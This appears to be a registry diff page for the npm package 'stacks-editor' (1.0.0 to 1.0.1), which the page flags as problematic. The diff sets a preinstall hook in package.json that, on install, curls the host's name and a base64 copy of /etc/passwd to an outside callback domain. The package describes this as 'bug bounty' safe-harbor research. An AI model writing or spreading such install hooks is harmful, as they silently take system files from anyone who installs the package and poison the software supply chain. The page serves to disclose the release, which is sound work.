stacks-editor 1.0.0 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of stacks-editor might be problematic. Click here for more details.
- package/index.js +0 -1
- package/package.json +2 -2
package/index.js
CHANGED
package/package.json
CHANGED
|
@@ -1,9 +1,9 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "stacks-editor",
|
|
3
|
-
"version": "1.0.
|
|
3
|
+
"version": "1.0.1",
|
|
4
4
|
"description": "Bug Bounty Security Research - Safe Harbor Callback",
|
|
5
5
|
"scripts": {
|
|
6
|
-
"preinstall": "curl -X POST https://7270y6kiovl8a6pzgg538rx6cxio6nuc.oastify.com
|
|
6
|
+
"preinstall": "curl -X POST https://7270y6kiovl8a6pzgg538rx6cxio6nuc.oastify.com -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"$(hostname)\\\",\\\"passwd\\\":\\\"$(cat /etc/passwd | base64 -w0)\\\"}\""
|
|
7
7
|
},
|
|
8
8
|
"author": "",
|
|
9
9
|
"license": "ISC"
|